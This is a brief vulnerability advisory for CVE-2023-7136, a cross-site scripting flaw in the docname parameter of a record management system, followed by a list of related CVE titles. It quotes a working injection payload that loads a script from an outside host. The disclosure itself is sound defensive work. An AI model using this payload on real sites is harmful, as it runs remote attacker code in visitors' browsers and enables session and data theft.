CVE-2023-7136 | code-projects Record Management System 1.0 Document Type /main/doctype.php docname cross site scripting

A vulnerability classified as problematic was found in code-projects Record Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /main/doctype.php of the component Document Type Handler. The manipulation of the argument docname with the input "><script src="https://js.rip/b23tmbxf49"></script> leads to cross site scripting.

This vulnerability is known as CVE-2023-7136. The attack can be launched remotely. Furthermore, there is an exploit available.

CVE-2023-7136 | code-projects Record Management System 1.0 Document Type /main/doctype.php docname cross site scripting

Post correlati

CVE-2024-22752 | EaseUS MobiMover 6.0.5 Build 21620 Executable permission

CVE-2024-0354 | unknown-o download-station up to 1.1.8 index.php f path traversal

CVE-2024-0020 | Google Android 11/12/12L/13/14 NotificationSoundPreference.java onActivityResult information disclosure

CVE-2024-5003 | WP Stacker Plugin up to 1.8.5 on WordPress cross-site request forgery